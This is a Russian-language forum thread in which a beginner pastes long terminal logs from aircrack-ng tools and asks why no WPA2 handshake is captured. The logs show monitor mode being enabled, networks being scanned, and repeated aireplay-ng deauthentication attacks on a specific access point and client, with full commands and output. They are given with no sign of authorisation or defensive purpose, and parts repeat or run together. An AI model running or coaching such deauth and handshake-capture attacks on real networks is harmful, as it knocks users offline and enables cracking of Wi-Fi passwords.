19:48:10 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 10
19:48:10 wlan1mon is on channel 10, but the AP uses channel 6
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon
19:48:18 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c ).
19:48:19 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:48:19 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:48:20 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:48:20 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:48:21 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:48:21 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:48:23 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:48:23 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:48:25 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:48:28 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon
19:49:18 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 8
19:49:18 wlan1mon is on channel 8, but the AP uses channel 6
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon
19:49:22 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 3
19:49:22 wlan1mon is on channel 3, but the AP uses channel 6
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon
19:49:26 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 4
19:49:26 wlan1mon is on channel 4, but the AP uses channel 6
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon
19:49:33 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c ).
19:49:33 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:49:34 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:49:34 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:49:35 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:49:35 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:49:35 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:49:38 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:49:38 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:49:40 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:49:42 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon
19:50:19 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 1
19:50:19 wlan1mon is on channel 1, but the AP uses channel 6
root@neo:~# aireplay-ng --deauth 10 -a 6C:5F:1C:BE:E3:B7 wlan1mon
19:51:12 Waiting for beacon frame (BSSID: 6C:5F:1C:BE:E3:B7) on channel 11
19:51:22 No such BSSID available.
Please specify an ESSID (-e).
root@neo:~#
root@neo:~#
root@neo:~#
root@neo:~#
root@neo:~#
root@neo:~# aireplay-ng --deauth 10 -a 6C:5F:1C:BE:E3:B7 wlan1mon
19:51:28 Waiting for beacon frame (BSSID: 6C:5F:1C:BE:E3:B7) on channel 6
19:51:38 No such BSSID available.
Please specify an ESSID (-e).
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 -c 6C:5F:1C:BE:E3:B7 wlan1mon
19:52:22 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6
19:52:22 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
19:52:22 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
19:52:23 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
19:52:23 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
19:52:24 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 019:52:28 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
19:52:31 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
19:52:39 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 019:52:44 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
19:52:47 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
19:52:54 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 019:53:00 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
19:53:02 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 019:53:08 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 119:53:08 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 219:53:08 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 1| 2 ACKs]
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 -c 6C:5F:1C:BE:E3:B7 wlan1mon
19:53:16 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6
19:53:16 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
19:53:16 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
19:53:17 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 019:53:28 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
19:53:34 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 0 ACKs]
19:53:43 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 019:53:48 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
19:53:50 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 019:53:55 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 1 ACKs]
19:53:58 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 019:54:00 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 119:54:06 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 0| 219:54:06 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 1| 219:54:06 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 1| 319:54:06 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 2| 319:54:06 Sending 64 directed DeAuth. STMAC: [6C:5F:1C:BE:E3:B7] [ 2| 4 ACKs]
^C
root@neo:~# aireplay-ng --deauth 10 -a 6C:5F:1C:BE:E3:B7 wlan1mon19:54:19 Waiting for beacon frame (BSSID: 6C:5F:1C:BE:E3:B7) on channel 11
19:54:29 No such BSSID available.
Please specify an ESSID (-e).
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon19:54:33 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c ).
19:54:34 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:54:34 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:54:35 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:54:39 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:54:48 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:54:49 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:54:51 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:54:53 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:54:54 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:54:56 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon
19:55:30 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c ).
19:55:30 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:55:31 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:55:31 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:55:32 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:55:32 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:55:33 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:55:34 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:55:35 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:55:37 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:55:37 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon
19:56:07 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 5
19:56:08 wlan1mon is on channel 5, but the AP uses channel 6
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon
19:56:17 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c ).
19:56:17 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:56:18 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:56:18 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:56:19 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:56:19 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:56:19 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:56:21 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:56:22 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:56:24 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:56:26 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 -c 6C:5F:1C:BE:E3:B7 wlan1
Interface wlan1:
ioctl(SIOCGIFINDEX) failed: No such device
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 -c 6C:5F:1C:BE:E3:B7 wlan1mon
19:56:51 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 10
19:56:51 wlan1mon is on channel 10, but the AP uses channel 6
root@neo:~# aireplay-ng --deauth 10 -a 6C:5F:1C:BE:E3:B7 wlan1mon19:57:02 Waiting for beacon frame (BSSID: 6C:5F:1C:BE:E3:B7) on channel 6
19:57:12 No such BSSID available.
Please specify an ESSID (-e).
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon19:57:22 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 3
19:57:23 wlan1mon is on channel 3, but the AP uses channel 6
root@neo:~#
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon
19:57:25 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 2
19:57:26 wlan1mon is on channel 2, but the AP uses channel 6
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon
19:57:28 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c ).
19:57:28 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:57:28 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:57:29 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:57:29 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:57:30 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:57:30 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:57:33 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:57:33 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:57:35 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
19:57:37 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
root@neo:~# aireplay-ng wlan1mon -a 84:C9:B2:CB:84:D2 -0 10 -- ignore-negative-one
"aireplay-ng --help" for help.
root@neo:~# aireplay-ng mon -a 84:C9:B2:CB:84:D2 -0 10 -- ignore-negative-one
"aireplay-ng --help" for help.
root@neo:~# aireplay-ng wlan1mon -a 84:C9:B2:CB:84:D2 -0 10 --ignore-negative-one
20:12:15 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c ).
20:12:16 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:12:16 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:12:17 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:12:17 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:12:18 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:12:18 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:12:20 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:12:20 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:12:22 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:12:22 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
root@neo:~# aireplay-ng wlan1mon -a 84:C9:B2:CB:84:D2 -0 10 --ignore-negative-one
20:13:05 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c ).
20:13:05 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:13:06 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:13:06 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:13:07 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:13:07 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:13:08 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:13:09 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:13:10 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:13:11 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:13:12 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
root@neo:~# aireplay-ng wlan1mon -a 84:C9:B2:CB:84:D2 -0 10 --ignore-negative-one
20:13:48 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c ).
20:13:48 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:13:49 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:13:49 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:13:50 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:13:50 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:13:51 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:13:52 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:13:53 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:13:55 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:13:55 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
root@neo:~# aireplay-ng wlan1mon -a 84:C9:B2:CB:84:D2 -0 10 --ignore-negative-one
20:17:12 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c ).
20:17:13 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:17:13 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:17:13 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:17:14 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:17:14 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:17:15 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:17:15 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:17:17 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:17:19 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:17:19 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
root@neo:~# aireplay-ng wlan1mon -a 84:C9:B2:CB:84:D2 -0 10 --ignore-negative-one
20:17:33 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c ).
20:17:33 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:17:34 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:17:34 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:17:35 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:17:35 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:17:36 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:17:37 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:17:38 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:17:40 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:17:41 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
root@neo:~# aireplay-ng wlan1mon -a 84:C9:B2:CB:84:D2 -0 10 --ignore-negative-one
20:26:51 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c ).
20:26:51 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:26:52 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:26:52 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:26:53 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:26:53 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:26:54 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:26:56 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:26:56 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:26:58 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:27:00 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:84:D2 wlan1mon20:27:19 Waiting for beacon frame (BSSID: 84:C9:B2:CB:84:D2) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c ).
20:27:19 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:27:19 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:27:20 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:27:20 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:27:21 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:27:21 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:27:23 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:27:24 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:27:26 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
20:27:28 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:84:D2]
root@neo:~#
Triton_Mgn
05.11.2015, 22:36
а что видео то боком
Взял что было под рукой samsung 7262 ни разу на него не снимал, на камере флешка забита, ну вроде смысл то понятен.
Triton_Mgn
05.11.2015, 22:49
Уважаемые форумчане!
Ни как не могу поймать хендшейки,я новичок, подскажите что не так делаю.
Заранее спс.
root@neo:~# iwconfig
eth0 no wireless extensions.
wlan0 IEEE 802.11bgn ESSIDff/any
Mode:Managed Access Point: Not-Associated Tx-Power=15 dBm
Retry short limit:7 RTS thrff Fragment thrff
Encryption keyff
Power Managementff
lo no wireless extensions.
wlan1 IEEE 802.11bgn ESSIDff/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr=2347 B Fragment thrff
Encryption keyff
Power Managementff
root@neo:~# airmon-ng check kill
Killing these processes:
PID Name
819 wpa_supplicant
root@neo:~# iwconfig
eth0 no wireless extensions.
wlan0 IEEE 802.11bgn ESSIDff/any
Mode:Managed Access Point: Not-Associated Tx-Power=15 dBm
Retry short limit:7 RTS thrff Fragment thrff
Encryption keyff
Power Managementff
lo no wireless extensions.
wlan1 IEEE 802.11bgn ESSIDff/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr=2347 B Fragment thrff
Encryption keyff
Power Managementff
root@neo:~# airmon-ng start wlan1
No interfering processes found
PHY Interface Driver Chipset
phy0 wlan0 ath9k Qualcomm Atheros AR9485 Wireless Network Adapter (rev 01)
phy1 wlan1 rtl8192cu
(mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon)
(mac80211 station mode vif disabled for [phy1]wlan1)
root@neo:~# airmon-ng start mon
No interfering processes found
PHY Interface Driver Chipset
phy0 wlan0 ath9k Qualcomm Atheros AR9485 Wireless Network Adapter (rev 01)
phy1 wlan1mon rtl8192cu
root@neo:~# iwconfig
wlan1mon IEEE 802.11bgn Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm
Retry short limit:7 RTS thr=2347 B Fragment thrff
Power Managementn
eth0 no wireless extensions.
wlan0 IEEE 802.11bgn ESSIDff/any
Mode:Managed Access Point: Not-Associated Tx-Power=15 dBm
Retry short limit:7 RTS thrff Fragment thrff
Encryption keyff
Power Managementff
lo no wireless extensions.
root@neo:~# airodump-ng mon
Interface mon:
ioctl(SIOCGIFINDEX) failed: No such device
root@neo:~# airodump-ng wlan1mon
CH 9 ][ Elapsed: 18 mins ][ 2015-11-05 19:49
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
84:C9:B2:CB:842 -22 5040 9300 0 6 54e WPA2 CCMP PSK DSL_2640NRU
BSSID STATION PWR Rate Lost Frames Probe
84:C9:B2:CB:842 6C:5F:1C:BE:E3:B7 -30 0e- 0e 326 9352
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:842 wlan1mon
19:43:32 Waiting for beacon frame (BSSID: 84:C9:B2:CB:842) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
19:43:33 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:43:33 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:43:34 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:43:34 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:43:35 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:43:35 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:43:37 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:43:37 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:43:39 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:43:40 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:842 wlan1mon
19:44:22 Waiting for beacon frame (BSSID: 84:C9:B2:CB:842) on channel 11
19:44:22 wlan1mon is on channel 11, but the AP uses channel 6
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:842 wlan1mon
19:44:33 Waiting for beacon frame (BSSID: 84:C9:B2:CB:842) on channel 11
19:44:33 wlan1mon is on channel 11, but the AP uses channel 6
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:842 wlan1mon
19:44:37 Waiting for beacon frame (BSSID: 84:C9:B2:CB:842) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
19:44:37 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:44:38 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:44:38 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:44:39 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:44:39 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:44:40 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:44:42 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:44:42 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:44:44 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:44:46 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:842 wlan1mon
19:48:10 Waiting for beacon frame (BSSID: 84:C9:B2:CB:842) on channel 10
19:48:10 wlan1mon is on channel 10, but the AP uses channel 6
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:842 wlan1mon
19:48:18 Waiting for beacon frame (BSSID: 84:C9:B2:CB:842) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
19:48:19 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:48:19 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:48:20 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:48:20 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:48:21 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:48:21 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:48:23 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:48:23 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:48:25 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
19:48:28 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:842 wlan1mon
19:49:18 Waiting for beacon frame (BSSID: 84:C9:B2:CB:842) on channel 8
19:49:18 wlan1mon is on channel 8, but the AP uses channel 6
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:842 wlan1mon
19:49:22 Waiting for beacon frame (BSSID: 84:C9:B2:CB:842) on channel 3
19:49:22 wlan1mon is on channel 3, but the AP uses channel 6
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:842 wlan1mon
19:49:26 Waiting for beacon frame (BSSID: 84:C9:B2:CB:842) on channel 4
19:49:26 wlan1mon is on channel 4, but the AP uses channel 6
root@neo:~# aireplay-ng --deauth 10 -a 84:C9:B2:CB:842 wlan1mon
19:49:33 Waiting for beacon frame (BSSID: 84:C9:B2:CB:842) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
19:49:33 Sending DeAuth to broadcast -- BSSID: [84:C9:B2:CB:842]
